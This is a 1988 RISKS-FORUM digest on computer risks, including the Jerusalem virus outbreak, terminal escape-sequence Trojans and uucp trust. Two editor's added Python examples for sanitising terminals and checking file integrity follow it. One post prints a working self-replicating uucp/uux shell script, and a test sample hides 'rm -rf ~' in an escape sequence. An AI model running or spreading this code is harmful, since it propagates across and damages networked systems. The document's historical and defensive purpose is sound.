RISKS-LIST: RISKS-FORUM Digest   Friday, 22 January 1988   Volume 6 : Issue 12

   FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS
   ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Contents:
  Risks in technology transfer policy (Alan Wexelblat)
  Trojan-horsed smart terminals? (Tim McDaniel)
  The virus reaches Israel (Martin Minow)
  Checking for Trojan Horses and Viruses (Dennis L. Mumaugh)
  RISKS of uux(1) and trusting remote hosts (Abercrombie)
  Sheep, Goats, and responding to computer-generated requests (Martin Smith)
  Proposal for Fault Tolerance Newsgroup (Don Lee)

The RISKS Forum is moderated. Contributions should be relevant, sound, in good taste, objective, coherent, concise, nonrepetitious. Diversity is welcome.
Contributions to RISKS@CSL.SRI.COM, Requests to RISKS-Request@CSL.SRI.COM.
For Vol i issue j, FTP SRI.COM, CD STRIPE:, GET RISKS-i.j.
Volume summaries in (i, max j) = (1,46),(2,57),(3,92),(4,97),(5,85).

----------------------------------------------------------------------

Date: Tue, 19 Jan 88 14:48:17 CST
From: Alan Wexelblat
Subject: Risks in technology transfer policy

One of the RISKS of technology is in attempts to control it. For the last seven years, the Reagan Administration has adopted an increasingly restrictive export licensing policy, aimed at reducing what they see as a problem of excessive technology transfer to East bloc countries. However, this policy and its implementation have their own risks. Recently, a National Academy of Sciences panel criticized the policy as "not generally perceived as rational, credible and predictable."

One victim of this policy is Columbus Instruments, a small company located in Columbus, Ohio, which specializes in equipment used with animals in medical research labs. In June 1985, Dr. Jan Czekajewski, president of the company, shipped $228,000 worth of lab-animal research equipment to a medical symposium in Moscow.
Included in the shipment were 5 personal computers, including a Taiwan-made PC-XT clone. Dr. Czekajewski didn't think he needed an export license.

Under the Pentagon's Project Exodus, which was set up to stop shipment of strategic items to the Soviet bloc, US Customs agents seized the equipment at Kennedy Airport, descended on Czekajewski's offices, confiscated his files and notified television stations of the "critical leak of militarily sensitive technology" narrowly averted by the Customs Service.

Czekajewski went to Eastern Europe to check the availability of microcomputers. He found the IBM PC-XT and AT computers available in Poland, and in Bulgaria he bought a locally-made PC clone. After taking it back to Ohio, he discovered that he would need an export license to ship it back to Bulgaria!

Two and a half years after the original raid, Czekajewski still doesn't have all his equipment back, and his battles with Customs and the Pentagon have cost him several hundred thousand dollars in legal fees, time, energy, and lost sales.

Another victim is Alan Kay. He was invited by Gosplan, the Soviet central planning agency, to give a seminar in Moscow and describe how Gosplan could become more market-oriented. He wrote to the US Commerce Department and asked if any license was needed in order to describe software that he had designed which was commercially available in the US. He got a letter from Dan Haydosh, then acting director of the Office of Technology and Policy Analysis, indicating that the seminar would require an export license since it "presents a significant risk to our national security."

Readers of the space digest know that many American companies are hurting because of the lack of launchers for commercial satellites; yet the government won't allow them to launch on Soviet rockets. Communications and weather tracking are both suffering as aging satellites break and can't be repaired or replaced.
According to the National Academy of Sciences, the Reagan administration crackdown has essentially failed and is costing the US economy over $9 billion a year in lost trade.

I frankly don't expect this to get better anytime soon. Comments?

--Alan Wexelblat
UUCP: {harvard, gatech, pyramid, &c.}!sally!im4u!milano!wex

------------------------------

Date: Wed, 13 Jan 88 01:56:08 CST
From: mcdaniel@uicsrd.csrd.uiuc.edu (Tim McDaniel)
Subject: Trojan-horsed smart terminals?

We just brought up BSD 4.3 (!) on our Vax. "finger" has been changed, so that a control character control-x is printed as "^X". (Actually, it doesn't come close to doing that, but that's beside the point.) The list of changes for 4.3 says that this was done to prevent Trojan horses. I assume that this refers to sending control sequences to very "smart" terminals.

Tim McDaniel, Center for Supercomputing Research and Development at the University of Illinois at Urbana-Champaign
Internet, BITNET: mcdaniel@uicsrd.csrd.uiuc.edu
UUCP: {ihnp4,uunet,convex}!uiucuxc!uicsrd!mcdaniel
CSNET: mcdaniel%uicsrd@uiuc.csnet

   [The bug of squirrelled CTL and ESC sequences was mentioned long ago in RISKS, and presumably has been fixed in most sensible systems! Of course, it still may lurk in non-mail contexts -- including FINGERing someone's Trojan PLAN. The FINGER vulnerability has not been mentioned explicitly, but is implicit in the earlier discussions. It is truly a Trojan horse, and even nastier than one contained in received mail -- it is triggered by curiosity on the part of the victim without action on the part of the perpetrator. By the way, the Christmas Tree "virus" (RISKS-5.79 ff.) is of course really a Trojan horse with an embedded virus. The ARF-ARF PC Graphics Trojan horse was also noted a while back.
   PGN]

------------------------------

From: minow%thundr.DEC@decwrl.dec.com (Martin Minow THUNDR::MINOW ML3-5/U26 223-9922)
Date: 16 Jan 88 12:00
Subject: The virus reaches Israel [See RISKS-6.6]

With Nitsan Duvduvani's (nitsan%tav02.dec@decwrl.dec.com) permission, I'm enclosing an article from an Israeli newspaper on the infamous virus. The article is translated by Nitsan, and was sent to me by Aharon Goldman (goldman%tav02.dec@decwrl.dec.com). I've lightly copy-edited it.

Martin Minow

[The following is translated from an article that appeared in "Maariv" (one of Israel's most popular daily newspapers) on 8-Jan-1988. I translated it myself, so I apologize for the poor style. My own comments appear in brackets '[]' within the translated text - Nitsan Duvduvani]

THE 'COMPUTER AIDS' VIRUS CONTINUES TO RUN WILD: 'BEWARE OF FRIDAY THE 13-TH OF MAY'

The Hebrew University [in Jerusalem] published this warning yesterday, as on the above date the virus may destroy any information found in the computer's memory or on the disks. Immunization programs are distributed to locate the virus and exterminate it.

by Tal Shahaf

The computer virus that got the nickname "the Israeli Virus" continues to run wild. The Hebrew University in Jerusalem spread the warning yesterday: Don't use your computer on Friday, the 13-th of May this year! On this day the virus was programmed to wake up from its hibernation - and destroy any information found in the computer memory or on the disks. For this reason, it also got the nickname "time bomb". Moreover, every 13-th of each month, the virus will cause a significant slow-down in the computer's response.

Evidence was received by Maariv yesterday of the existence of the virus in many other places in addition to the Hebrew University in Jerusalem. It was also reported to be detected in one of the I.D.F. [Israeli Defense Forces] units using personal computers.
Other messages mentioned some commercial companies where the virus had been detected. An owner of a software house from Tel-Aviv, who asked to remain anonymous, told that the malfunctions were detected in software kits that were bought with the computers and were installed by the selling company. Eli Shapira, an owner of a computer store from Haifa, tells about infected software kits that reached him from people in the area. The virus also infected a computer in his store, and possibly spread to customers who had bought software kits. According to him there was a thorough disinfection activity that cleared the computer and the diskettes in the store.

Computer experts warn that the virus may now be in any software and in any computer, including those purchased in computer stores. Currently, the Hebrew University distributes immunization programs that can detect the virus in the computer's memory and exterminate it.

A new problem popped up though: A mutation of the virus may show up, a few times as dangerous as the current virus. It all depends on the source of the virus and whether the person responsible for it is some computer wizard who did it for fun or some psychopath who does not control his actions.

"THE ISRAELI VIRUS" SPREADS AT THE RATE OF AIDS

The immunization programs fit only the virus from Jerusalem. The unauthorized software copying phenomenon is expected to stop.

by Tal Shahaf

The model that best fits the spreading of the computerized virus is the AIDS virus, so claim computer staff. The resemblance is in all dimensions. The spreading rate of the virus is amazing. A single infected diskette is sufficient for infecting thousands of personal computers. It is passed by diskettes going between computers, and also by telephone communication between computers.

Yesterday it was found out that the virus was much more widely spread than what was thought. For this reason, users are warned not to receive diskettes from unknown sources.
First precaution: do not use diskettes without the "computerized condom": a little sticker that prevents any damage to the information on the diskette.

The computer community is grateful for stopping the process of unauthorized copying of software that reached incredible use lately. Exactly like AIDS, which generated the safe sex phenomenon, the computerized virus is about to generate the phenomenon of decent use only of software.

The phenomenon of growing infected software was discovered yesterday as a side effect only. The real damage is the hidden time bomb: Every 13-th of each month, the virus will cause a significant slow down in the computer response, and on the 13-th of May this year it will erase all the information in the computer.

Yuval Rahavi, the computer expert from Jerusalem who discovered the vicious virus, explains that it is a small and sophisticated computer program. When the computer is turned on, the program is loaded into the computer memory, and from then on, any program invoked is contaminated. When the virus identifies a new program, it joins it without disturbing its activity. From then on, any use of this software, or transferring it to another user, will spread the virus.

The temporary solution to the problem is the immunization programs written by Rahavi. One is used to detect the virus and the other for prevention. It is loaded into the computer memory before any other software. If the virus then attempts to reside in the memory, the program will give an appropriate warning. People from the Hebrew University distributed information that described the virus to all the computer users at the universities, together with copies of the immunization programs.

Ofer Ahituv, an owner of a software house, thinks the source of the virus is in one of the software houses which became involved with his programmers. According to him, all his software kits will now be distributed carrying a label specifying they were checked and found clean of any virus.
The possibility of a new virus, which is more dangerous, scares computer people. Such a virus may harm the information, erasing it slowly in such a way that it is not detectable. This way, accountants may find out all their clients' accounting data has been erased, banks will lose their customers' data, stores - their cash register data. The immunization programs are good for fighting the current virus. If a new virus pops up - these immunizations will be worthless.

Ezra Ben-Kohav, chairman of the computer organization I.O.I.P. [Israeli Organization for Information Processing] told Maariv yesterday: "There is no law that defines such action as a crime. If the author is caught, there will be nothing to blame him/her for."

Arie Bender gives the following message: A search team was established in the Hebrew University, which includes Hilel Bar-Dayan, Amiram Ofir, Eli Peled and Elisha Ben-Ezra. People in the university asked yesterday to make clear there was no information or suspicion about the creators of the virus, including students of the Talpiot program [a special program for young students that combines army studying].

THIS IS HOW TO PROTECT YOUR COMPUTER

Yossi Gil, one of the computer people who discovered the virus, suggests several defense activities for the computer users who receive a new diskette and want to check it.

1. During the check, activate the computer without a hard disk that may be infected by the virus.
2. Use diskettes that carry no important information/programs.
3. Invoke the checked software with a diskette protected by a sticker.
4. Invoke the software again with a diskette without a sticker.
5. Compare the two diskettes using a compare program. If no differences are found, you may assume the checked diskette is free of the virus.
6. Another rule which is always important: Prepare a copy of any important diskette, and specify the date when the copy was made.
If the virus attacks your computer, you will be able to restore the damaged programs from these copies.

(by Tal Shahaf)

THE VIRUS REACHED HAIFA

The "Israeli virus" was detected, after causing much damage, also in the educational center of the ministry of education in the Rotenberg building on the Carmel [mountain in Haifa]. There is a computer project going on at this site, in which tens of students participate. The center manager, Gideon Goldstein, and the project people Michael Hazan and Gadi Kats, told that 6 weeks ago a virus was discovered, which destroyed 15 thousand dollars worth of software and 2 disks in which 7000 hours of work had been invested, in an irrecoverable way.

(by Reuven Ben-Zvi)

PANIC AMONG OWNERS OF PERSONAL COMPUTERS

The Israeli virus panic moved from within the campus and spread out also to the computer consumers in Jerusalem. In many stores there were customers reporting symptoms in their home computers that matched those which had been found in the P.C. systems in the university. "This morning we ran into and heard about a few cases", told Emanuel Marinsky, manager of a computer services lab, "It raises panic".

(by Arie Bender)

------------------------------

Date: Thu, 7 Jan 88 18:02:04 est
From: moss!cuuxb!dlm@RUTGERS.EDU
Subject: Checking for Trojan Horses and Viruses -- a partial solution

In the latest discussions there has been some thought as to how to prevent viruses and Trojan horses ...

I am now using an internal product called "truss" that involves the "proc" file system of UNIX Version 8 (and other developmental versions). Truss is a system call tracer. It allows one to examine any process and observe all system calls. It lists the system call, and the arguments. This is done intelligently with translations of arguments to strings and human format data. It also gives the return value of the call and translates error codes into symbolics.
With this product one can watch the behavior of a program and observe what it does (at a gross level) and who or what it operates on. Truss is able to handle the fork/exec of UNIX and follow the child processes (limited recursion). Thus one can attach truss to a login shell and watch a terminal session of a suspect. Also truss can attach to a process under execution and not related to the initiator. Truss can also freeze the process in its tracks and allow another product (a debugger) more intimate access to the errant process.

The utility as a systems security device AFTER initial suspicion is raised is obvious.

The RISK? Applying this to MY operations. After all, who is to determine what a virus is?

Dennis L. Mumaugh
Lisle, IL
...!{attunix,ihnp4,cbosgd,lll-crg}!cuuxb!dlm

   [There is also the problem of locking the barn door after the Trojan horse has escaped. Baled out? A Trojan cake hidden in a file instead of a file hidden in the cake? PGN]

------------------------------

From: sdsu!Abercrombie%minas-morgul.csa.com@sdcsvax.ucsd.edu
Date: Wed, 6 Jan 88 23:37:55 GMT
To: RISKS@csl.sri.com
Subject: RISKS of uux(1) and trusting remote hosts

There has been much talk recently about viruses and other malevolent programs. I will add just one more to the discussion. It is well known that the UNIX operating system is not very secure -- it is also well known that there are many thousands of UNIX machines in place.

The following program owes its operation to the uucp(1) and uux(1) commands. On most sane systems, the execution of commands using uux is restricted. But, by contacting every system known to the current host, it is very likely that some of the system managers have forgotten to plug this simple hole. There are similar holes that command restriction does not plug, but it would be a mistake to elucidate further.

I do not advocate that you execute the following program. It is meant for expository purposes only.
However, it does not contain any harmful commands except perhaps that it could flood the network indefinitely.

In closing I would remind everyone that when you connect one machine to another there is a degree of trust involved. Many a system has been undone by trusting an untrustworthy system -- a simple example would be a faculty machine connected to a machine accessible to students and have the student machine mentioned in the /etc/hosts.equiv file.

-- CUT --
#
# A very simple virus.
#
# Assumes this script already sits at /tmp/virus on the current host.
# For every uucp neighbour this host knows about (uuname), ship a copy of
# the script there and queue a request for the remote uuxqt to run it with
# sh; the copy then repeats the process from that host.  The "\!" keeps
# csh from treating "!" as history substitution; sh does not need it.
#
for x in `uuname`
do
        uucp -C /tmp/virus $x\!/tmp/virus
        uux $x\!"sh -c /tmp/virus"
done
rm -f /tmp/virus

------------------------------

Date: 17 Jan 1988 20:38:14 GMT
From: MartinSm
Subject: Sheep, Goats, and responding to computer-generated requests

I don't know how these things work in America but over here forms are sent out each year to register to vote in elections and by law they *MUST* be completed. This year another form was sent out in the same envelope, computer printed and requesting information such as the number of people in the house of 'Ethnic Origin' or Unemployed or Disabled. Nowhere on the form did it say that it had nothing to do with the electoral register and had no legal status. It had been issued by our local council (Leeds) and contained a suspicious looking code number in the corner which could be used to discover which household had filled it in, though no address was printed which would have made this obvious.

Naturally the form went in the bin immediately. A couple of weeks later a letter arrived saying in essence that we had been *RANDOMLY* chosen from a *SMALL* number of people who were being uncooperative. We were to be visited by someone who was going to get us to fill it in. As yet this has not occurred but if it does they are not getting past the door.

The situation becomes more interesting when you know that there was a scandal involving council officers writing to department heads and asking for their master passwords.
This information was usually provided, on the pre-printed form, without question. This is the "sheep" factor again.

It seems to be becoming increasingly common for people to request information for nefarious, nonessential or unexplained reasons. I think we have a lot to worry about. Especially in a country like the UK where it is much easier to put data into officials' hands than to get it out of them.

Martin Smith, Langwith College, University Of York, Heslington, York, YO1 5DD England

------------------------------

From: trwrb!dlee@aero.arpa (Don Lee)
Subject: Proposal for Fault Tolerance Newsgroup
Date: 5 Jan 88 21:41:00 GMT
Reply-To: trwrb!aero!dlee@ucbvax.Berkeley.EDU (Don Lee)
Organization: The Aerospace Corporation, El Segundo, CA

I would like to propose the formation of a new newsgroup, comp.fault_tolerance, that would discuss technical issues related to fault tolerance. Such a newsgroup is needed, since there is no current newsgroup that discusses the technical issues involved in fault-tolerant computing.

Fault tolerance is an extremely diversified area of computing that is not only concerned with hardware and software, but also with, to name a few, interconnection networks, real-time systems, parallel and alternative architectures, and data base systems. Issues also involve modeling (including automated reliability models such as CARE III, HARP, ARIES, and CRAFTS) and simulation of fault-tolerant systems.

Since fault-tolerant computing is such a diversified area it is easy to imagine that such a large volume of articles would be posted that the average reader would have a difficult time keeping up. Therefore, the newsgroup should be moderated. I am willing to be the group moderator.

If anyone has any comments regarding the name and nature of the group please post them to news.groups. I will answer them as soon as possible. Please send any votes for or against the group to me personally.
I hope that the group will be formed very shortly, and I look forward to the interesting and informative articles that I am sure will be posted to comp.fault_tolerance.

Thank you,
Don Lee

------------------------------

End of RISKS-FORUM Digest
************************
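Editor's added example (not part of the digest, and not the BSD 4.3 finger source): Tim McDaniel's item above describes finger being changed so that a control character such as control-x is printed as "^X", to stop a .plan file from pushing escape sequences at a "smart" terminal. The function below does that conversion for an untrusted byte string. The hostile .plan it is run against is constructed for this example; the bytes are arbitrary and no particular terminal's key-programming sequence is claimed.

```python
"""Neutralize terminal control sequences in untrusted text (caret notation).

Added illustration code, not the BSD 4.3 finger source.  A terminal acts on
control bytes wherever they come from; rendering each one visibly means a
.plan (or any other untrusted text) reaches the screen as text only.
"""

ESC = 0x1B
DEL = 0x7F


def caret(byte: int) -> str:
    """Caret notation for one C0 control byte: 0x01 -> '^A', 0x1B -> '^[', 0x7F -> '^?'."""
    if byte == DEL:
        return "^?"
    return "^" + chr(byte + 0x40)


def sanitize_plan(data: bytes, keep_newlines: bool = True) -> str:
    """Return `data` with every control byte made visible.

    - printable ASCII (0x20..0x7E) passes through unchanged
    - newline and tab pass through when keep_newlines is set, since a
      .plan legitimately contains them
    - every other byte below 0x20, plus DEL, becomes caret notation
    - bytes >= 0x80 are shown as \\xNN, so 8-bit C1 controls (for example
      0x9B, the 8-bit CSI) cannot reach the terminal either
    """
    out = []
    for b in data:
        if 0x20 <= b < DEL:
            out.append(chr(b))
        elif keep_newlines and b in (0x09, 0x0A):
            out.append(chr(b))
        elif b < 0x20 or b == DEL:
            out.append(caret(b))
        else:
            out.append(f"\\x{b:02x}")
    return "".join(out)


def contains_raw_escape(data: bytes) -> bool:
    """True if the text still holds a byte a terminal would act on as a control."""
    return any((b < 0x20 and b not in (0x09, 0x0A)) or b >= DEL for b in data)


# Constructed sample: a .plan that tries to clear the screen, push a string
# at the terminal inside a device-control sequence, and ring the bell.  The
# bytes are made up for this example; the point is only that every ESC and
# BEL comes out as visible text.
HOSTILE_PLAN = b"Back at 5pm.\n\x1b[2J\x1bPrm -rf ~\x1b\\plan ends here\x07\n"


if __name__ == "__main__":
    print(sanitize_plan(HOSTILE_PLAN))
```

The check is on bytes rather than decoded text on purpose: a terminal sees bytes, and a decoder that silently drops or merges them would hide exactly the cases that matter.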
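Editor's added example (not part of the digest, and not the Hebrew University's immunization programs): the six-step procedure Yossi Gil gives in the Maariv article amounts to running a suspect program against a throwaway copy of some files and then comparing the result with an untouched copy. The code below mechanizes steps 2 through 5 on a modern system: a SHA-256 manifest stands in for the write-protected diskette, and a hash-by-hash diff stands in for the compare program. The "suspect program" it tests is a constructed stand-in that appends a marker to every .COM file, so the detector has something to catch; the file names and contents are made up for the example.

```python
"""Before/after file-integrity comparison for a program under test.

Added illustration code, not code from the digest or from the Hebrew
University.  It follows the quoted procedure: build a test set with no
important data, take a reference snapshot (the "protected" copy), run the
suspect program on a copy it may write to, and compare.
"""

import hashlib
import pathlib
import tempfile
from typing import Callable, Dict, List, Tuple


def manifest(root: pathlib.Path) -> Dict[str, str]:
    """Map each file's relative path to its SHA-256 hex digest."""
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            result[str(path.relative_to(root))] = digest
    return result


def diff_manifests(before: Dict[str, str], after: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every difference between two manifests (step 5 of the procedure)."""
    return {
        "modified": sorted(p for p in before if p in after and before[p] != after[p]),
        "added": sorted(p for p in after if p not in before),
        "deleted": sorted(p for p in before if p not in after),
    }


def build_test_set(root: pathlib.Path) -> None:
    """Constructed sample 'diskette' holding nothing important (step 2)."""
    (root / "HELLO.COM").write_bytes(b"\xb4\x09\xcd\x21\xc3")
    (root / "EDIT.COM").write_bytes(b"\xb8\x00\x4c\xcd\x21")
    (root / "README.TXT").write_bytes(b"clean test diskette\r\n")


def check_suspect(suspect: Callable[[pathlib.Path], None]) -> Tuple[bool, Dict[str, List[str]]]:
    """Run `suspect` on a scratch copy of the test set and report what it touched.

    Returns (clean, changes).  `clean` is True only if nothing was modified,
    added or deleted, which is the "no differences found" outcome of step 5.
    """
    with tempfile.TemporaryDirectory() as tmp:
        work = pathlib.Path(tmp) / "unprotected"
        work.mkdir()
        build_test_set(work)
        before = manifest(work)   # reference copy, as if write-protected (step 3)
        suspect(work)             # invoke the program on the writable copy (step 4)
        after = manifest(work)
        changes = diff_manifests(before, after)
        return not any(changes.values()), changes


def fake_infector(root: pathlib.Path) -> None:
    """Constructed stand-in for a file infector: appends to every .COM file it finds."""
    for path in root.rglob("*.COM"):
        with path.open("ab") as fh:
            fh.write(b"<<INFECTED>>")


def benign_program(root: pathlib.Path) -> None:
    """Constructed stand-in for a well-behaved program: reads everything, writes nothing."""
    for path in root.rglob("*"):
        if path.is_file():
            path.read_bytes()


if __name__ == "__main__":
    print(check_suspect(benign_program))
    print(check_suspect(fake_infector))
```

Two caveats the article's own steps already imply: step 1 (boot without the possibly infected hard disk) is what keeps a memory-resident virus from hooking the reads that the comparison depends on, and a program that only infects under some trigger (a date, a counter) will pass a single run, so a clean comparison shows the absence of an infection during that run, not the absence of a virus.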